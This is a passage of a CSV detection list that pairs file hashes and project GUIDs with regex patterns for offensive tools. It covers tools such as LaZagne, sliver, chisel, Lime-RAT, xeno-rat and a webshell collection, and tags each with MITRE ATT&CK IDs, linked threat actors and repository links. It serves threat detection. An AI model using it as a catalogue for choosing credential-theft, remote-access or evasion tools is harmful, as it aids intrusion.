"*9c1a7ef2f61628fc1d314b001169fcc7d2cede2f9ffe07705667ef7151fb014a*",".{0,1000}9c1a7ef2f61628fc1d314b001169fcc7d2cede2f9ffe07705667ef7151fb014a.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","31850"
"*9c1c5960a8a85b20b9ad5bd47d43f5b32ac403350bef95242ad4c8cc9dbe6556*",".{0,1000}9c1c5960a8a85b20b9ad5bd47d43f5b32ac403350bef95242ad4c8cc9dbe6556.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31851"
"*9C2282F1A49F43F1F541DD57C539C6B73D59E8924382B96B23881B85AC333928*",".{0,1000}9C2282F1A49F43F1F541DD57C539C6B73D59E8924382B96B23881B85AC333928.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31854"
"*9C30CAE4-6FBE-45CC-90C2-1D739DB92E86*",".{0,1000}9C30CAE4\-6FBE\-45CC\-90C2\-1D739DB92E86.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","31855"
"*9c3c1eef7d60285aad7b4d948847b9cbaf3f1676c6bcedfa40ff5f9629c8c5cf*",".{0,1000}9c3c1eef7d60285aad7b4d948847b9cbaf3f1676c6bcedfa40ff5f9629c8c5cf.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31859"
"*9c409702151446f1eb8d951b45a902f2dbad1ebeacab9dd9beeaa5530e65ad0c*",".{0,1000}9c409702151446f1eb8d951b45a902f2dbad1ebeacab9dd9beeaa5530e65ad0c.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","31860"
"*9c409702151446f1eb8d951b45a902f2dbad1ebeacab9dd9beeaa5530e65ad0c*",".{0,1000}9c409702151446f1eb8d951b45a902f2dbad1ebeacab9dd9beeaa5530e65ad0c.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","31861"
"*9c46104f36627ea0842bf00c050e6fb43befa60e56369e7d4ea843a198e16323*",".{0,1000}9c46104f36627ea0842bf00c050e6fb43befa60e56369e7d4ea843a198e16323.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","31862"
"*9c48888489f9c1b82e0b6db9725e9adb9cad702c8ba2de6dce77b2f560df855b*",".{0,1000}9c48888489f9c1b82e0b6db9725e9adb9cad702c8ba2de6dce77b2f560df855b.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31863"
"*9c4fb7421bff7098ad6cb75b882d76306305d1741abd89d5767c4f7d7f523a62*",".{0,1000}9c4fb7421bff7098ad6cb75b882d76306305d1741abd89d5767c4f7d7f523a62.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31864"
"*9c5b464168986c09b7013338cefd19b006468e8dd677a3bf8e6c9477dd6cee02*",".{0,1000}9c5b464168986c09b7013338cefd19b006468e8dd677a3bf8e6c9477dd6cee02.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31865"
"*9c6804a10a191fe49061ca8022394c3a44fba75e20aa0c1fbf79a07e01f28df5*",".{0,1000}9c6804a10a191fe49061ca8022394c3a44fba75e20aa0c1fbf79a07e01f28df5.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","31868"
"*9c681c023514a7ef4b402ac5f7225b9daa9244eb45443abfac27bdb684ceeebb*",".{0,1000}9c681c023514a7ef4b402ac5f7225b9daa9244eb45443abfac27bdb684ceeebb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31869"
"*9c6da7fb7b5e60318880442374b369ec6be4a6d39c76bc18c9e4603631a5fc6c*",".{0,1000}9c6da7fb7b5e60318880442374b369ec6be4a6d39c76bc18c9e4603631a5fc6c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31870"
"*9c7acf514e0444e5b30f506a295f7dc65b4a673dd9dbb9ca1558a612105be630*",".{0,1000}9c7acf514e0444e5b30f506a295f7dc65b4a673dd9dbb9ca1558a612105be630.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31872"
"*9c83d11868c8107f59440b4a1a5a7d1b0283be01781291a3ff5b22760340c11e*",".{0,1000}9c83d11868c8107f59440b4a1a5a7d1b0283be01781291a3ff5b22760340c11e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31873"
"*9c84bbd09726eb178ebe16830e8e126edf4f25db3e22721c64f4e42dd3e70f24*",".{0,1000}9c84bbd09726eb178ebe16830e8e126edf4f25db3e22721c64f4e42dd3e70f24.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","31874"
"*9c86335386ac653a324d51c1dcb3d43704a00da106833ecad21e5ffad4e8635b*",".{0,1000}9c86335386ac653a324d51c1dcb3d43704a00da106833ecad21e5ffad4e8635b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31875"
"*9c86afa8a40314b53a51281256047f5ecebbf396a7df0dc15fc54687016d88a4*",".{0,1000}9c86afa8a40314b53a51281256047f5ecebbf396a7df0dc15fc54687016d88a4.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31876"
"*9c887d5a9f4522a35749c9c91863c12d3e69b22f24ebfac41b3d6290c503a460*",".{0,1000}9c887d5a9f4522a35749c9c91863c12d3e69b22f24ebfac41b3d6290c503a460.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","31878"
"*9c8c6832651517a7f48e8cf246721ee80be13e61222f12ff5876f7cfb92a6308*",".{0,1000}9c8c6832651517a7f48e8cf246721ee80be13e61222f12ff5876f7cfb92a6308.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","31880"
"*9c9cc73f47b3b509df0845593e6b2f8d900f34772e4aaf3438bb0120303d5670*",".{0,1000}9c9cc73f47b3b509df0845593e6b2f8d900f34772e4aaf3438bb0120303d5670.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","#filehash","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","31881"
"*9ca943aed529d280554f86c58cd49fcfaf759d424cc64c9c062b6ab90de79e7e*",".{0,1000}9ca943aed529d280554f86c58cd49fcfaf759d424cc64c9c062b6ab90de79e7e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31882"
"*9ca9d965d2d159763c2ca4431a1fa6597ca6633f443732139340341c77f6a39f*",".{0,1000}9ca9d965d2d159763c2ca4431a1fa6597ca6633f443732139340341c77f6a39f.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","#filehash","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","31883"
"*9caa9d970f801818ebf71838c7338d726bdd70fc7cac343bdb21512c3bd6ceaa*",".{0,1000}9caa9d970f801818ebf71838c7338d726bdd70fc7cac343bdb21512c3bd6ceaa.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31884"
"*9cb46943dab29908a33b801ec3c2033f7878f19e0ee2f892cd6d0c0db6bdbaa5*",".{0,1000}9cb46943dab29908a33b801ec3c2033f7878f19e0ee2f892cd6d0c0db6bdbaa5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31886"
"*9cb8225eb4a16ee8537cf0f46ca3cf1c750db6b92deaf4c7d8029cce95b2dd3c*",".{0,1000}9cb8225eb4a16ee8537cf0f46ca3cf1c750db6b92deaf4c7d8029cce95b2dd3c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31888"
"*9cbbb2ac103af9b7940ec72a8e430427d86f5099f7a537e4fe2b72d69e05bdfd*",".{0,1000}9cbbb2ac103af9b7940ec72a8e430427d86f5099f7a537e4fe2b72d69e05bdfd.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#filehash","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","31889"
"*9ccca75a916af75a20ae9ab06c2361cd2aa8ec8e2a0a741ebbbc762cbeb4d230*",".{0,1000}9ccca75a916af75a20ae9ab06c2361cd2aa8ec8e2a0a741ebbbc762cbeb4d230.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#filehash","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","31890"
"*9CCE5C71-14B4-4A08-958D-4E593975658B*",".{0,1000}9CCE5C71\-14B4\-4A08\-958D\-4E593975658B.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","31891"
"*9CD?F6D5878FC3AECF10761FD72371A2877F270D0*",".{0,1000}9CD\?F6D5878FC3AECF10761FD72371A2877F270D0.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","31892"
"*9cd007dd93a195546eec029470211689568df8c877fdc5faef1e03f942097a9b*",".{0,1000}9cd007dd93a195546eec029470211689568df8c877fdc5faef1e03f942097a9b.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","31893"
"*9cd7158c53df4734b75aa23abce157d261f37eef1432b741078737cab19fa65c*",".{0,1000}9cd7158c53df4734b75aa23abce157d261f37eef1432b741078737cab19fa65c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31897"
"*9cd7f22a7d202899c075a524124a9509bc5dffd09ff2e797074e074a1ad48a5c*",".{0,1000}9cd7f22a7d202899c075a524124a9509bc5dffd09ff2e797074e074a1ad48a5c.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","31898"
"*9ce11125e29ab3e23d8b619ceb50fdb0eaf36d1602c8b3e69c02dc77a77d7779*",".{0,1000}9ce11125e29ab3e23d8b619ceb50fdb0eaf36d1602c8b3e69c02dc77a77d7779.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31899"
"*9ceea502f209095ccb4973a18078869931c6b635540f7315d8eccf75055d6f03*",".{0,1000}9ceea502f209095ccb4973a18078869931c6b635540f7315d8eccf75055d6f03.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31900"
"*9cf730bd8182e8ecc74d6f02dc2eba4dc40d1b50effa30941b522010513baeb6*",".{0,1000}9cf730bd8182e8ecc74d6f02dc2eba4dc40d1b50effa30941b522010513baeb6.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","31901"
"*9CFD5FA4-5AD6-463C-87E5-3F42133B5DA8*",".{0,1000}9CFD5FA4\-5AD6\-463C\-87E5\-3F42133B5DA8.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","31903"
"*9cfdc7b3004cb67d9d6360ff561cd0c3c2c304fdc6ff651aa8ca1d8f0def0c4e*",".{0,1000}9cfdc7b3004cb67d9d6360ff561cd0c3c2c304fdc6ff651aa8ca1d8f0def0c4e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31904"
"*9cfdc7b3004cb67d9d6360ff561cd0c3c2c304fdc6ff651aa8ca1d8f0def0c4e*",".{0,1000}9cfdc7b3004cb67d9d6360ff561cd0c3c2c304fdc6ff651aa8ca1d8f0def0c4e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31905"
"*9cfdc7b3004cb67d9d6360ff561cd0c3c2c304fdc6ff651aa8ca1d8f0def0c4e*",".{0,1000}9cfdc7b3004cb67d9d6360ff561cd0c3c2c304fdc6ff651aa8ca1d8f0def0c4e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31906"
"*9d07db60cd26c5d11f94aa666048b66948004a660ffb03fa7c3414e56f70ae5c*",".{0,1000}9d07db60cd26c5d11f94aa666048b66948004a660ffb03fa7c3414e56f70ae5c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31908"
"*9D08025F46B50B02A2B45CC2E6E83F85BC80C4AEEDEB8651E36B38DA29856542*",".{0,1000}9D08025F46B50B02A2B45CC2E6E83F85BC80C4AEEDEB8651E36B38DA29856542.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","31909"
"*9d0ff36d92bb6cac9255111b4af63700c5e796fe8233504b4acd1ec4f92bb43f*",".{0,1000}9d0ff36d92bb6cac9255111b4af63700c5e796fe8233504b4acd1ec4f92bb43f.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","#filehash","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","31912"
"*9d1292d97f03943a54c41497f4b4e3186dea857a276f76954206e42f848fa30d*",".{0,1000}9d1292d97f03943a54c41497f4b4e3186dea857a276f76954206e42f848fa30d.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","31913"
"*9D1B853E-58F1-4BA5-AEFC-5C221CA30E48*",".{0,1000}9D1B853E\-58F1\-4BA5\-AEFC\-5C221CA30E48.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","#GUIDproject","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","31914"
"*9d1c1b19e41b7543be1d209d368bbfec5ca14e413fe1b060354a79dabf29f727*",".{0,1000}9d1c1b19e41b7543be1d209d368bbfec5ca14e413fe1b060354a79dabf29f727.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31915"
